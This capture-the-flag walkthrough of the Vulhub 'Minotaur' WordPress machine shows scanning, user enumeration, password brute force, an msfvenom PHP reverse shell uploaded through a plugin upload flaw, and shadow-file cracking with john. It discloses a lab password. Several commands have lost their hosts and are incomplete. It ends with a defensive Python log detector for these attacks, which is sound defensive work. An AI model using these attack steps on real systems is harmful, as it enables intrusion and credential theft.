SecTalks: BNE0x00 - Minotaur

From Vulhub


  • netdiscover
  • Nmap
  • Wfuzz
  • WPscan
  • msfvenom
  • John the Ripper

Use netdiscover to detect the target IP address.

netdiscover -i eth0 -r is the target.

Then run nmap to detect open ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Ports 22, 80 and 2020 are open.

Use wfuzz to find more locations.

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null


Check the page; it looks like it uses WordPress. Good. Maybe I can find some outdated WordPress plugins.

I use wpscan to find WordPress plugin vulnerabilities.

ruby wpscan.rb --url

Got some XSS vulnerabilities and an interesting arbitrary file upload vulnerability.

Next step: user enumeration.

ruby wpscan.rb --url --enumerate u

Got a user name: bully.

Next step: password guessing.

ruby wpscan.rb --url --wordlist SecLists/Passwords/passwords_john.txt --threads 50

No luck this time. Let's try harder.

We use cewl this time to generate a password file.

cewl -w password.txt

John the Ripper should also be used to mutate the password file:

john --wordlist=password.txt --rules --stdout > out.txt

Now I use wpscan to brute force the password:

wpscan --url --wordlist out.txt --username bully

Now, create a PHP reverse shell:

msfvenom -p php/meterpreter/reverse_tcp lhost= -a php --platform php -o evil.php

Based on the wpscan scan result, the WordPress Slideshow Gallery shell upload exploit( is found. Save it as


python -t -u bully -p Bighornedbulls -f evil.php

Set up netcat:

nc -nlvp 1234


Get the meterpreter.

Run locate flag.txt and get the result /tmp/flag.txt.

Found a file shadow.bak in /tmp; I got some interesting things:

Looks like there are more chances for me. Download this file and use john to crack more.

john --fork=4 shadow.bak

Now I have two more accounts' info.

Use python:

python -c 'import pty; pty.spawn("/bin/bash")'

Login as heffer:

Login as minotaur:
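Seen from the defender's side, the user enumeration, the password guessing and the uploaded PHP file in this walkthrough all leave traces in the web server access log. The following is an added example, not part of the original write-up: a small Python detector run over constructed log lines. The combined log format, the ?author= enumeration pattern, the rule names and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
AUTHOR = re.compile(r'[?&]author=(\d+)')
UPLOADED_PHP = re.compile(r'/wp-content/uploads/[^?]*\.(php\d?|phtml)(\?|$)', re.I)

def detect(lines, max_logins=5, window=timedelta(minutes=1), min_authors=3):
    """Return (rule, ip, detail) findings; threshold rules fire once per crossing."""
    findings, logins, authors = [], defaultdict(list), defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, path, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if method == "POST" and "wp-login.php" in path:
            # Sliding window of login POSTs per client
            logins[ip] = [t for t in logins[ip] if when - t <= window] + [when]
            if len(logins[ip]) == max_logins + 1:
                findings.append(("login-bruteforce", ip,
                                 f"more than {max_logins} login POSTs within {window}"))
        author = AUTHOR.search(path)
        if author and author.group(1) not in authors[ip]:
            authors[ip].add(author.group(1))
            if len(authors[ip]) == min_authors:
                findings.append(("author-enum", ip,
                                 f"{min_authors} distinct ?author= ids requested"))
        if status == "200" and UPLOADED_PHP.search(path):
            # PHP should never be served from the media upload directory
            findings.append(("php-in-uploads", ip, path))
    return findings

# Constructed sample log (documentation IP ranges, made-up paths and sizes)
SAMPLE = (
    [f'203.0.113.7 - - [12/May/2015:09:59:5{n} +0000] "GET /?author={n} HTTP/1.1" 301 0' for n in (1, 2, 3)]
    + [f'203.0.113.7 - - [12/May/2015:10:00:0{s} +0000] "POST /wp-login.php HTTP/1.1" 200 3021' for s in range(8)]
    + ['203.0.113.7 - - [12/May/2015:10:05:00 +0000] "GET /wp-content/uploads/gallery/x.php HTTP/1.1" 200 0',
       '198.51.100.4 - - [12/May/2015:10:06:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
       '198.51.100.4 - - [12/May/2015:10:07:00 +0000] "GET /wp-content/uploads/2015/05/logo.png HTTP/1.1" 200 5120']
)

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(*finding, sep="\t")
```

Denying PHP execution under the uploads directory in the web server configuration removes the last finding's impact even when an upload flaw is present.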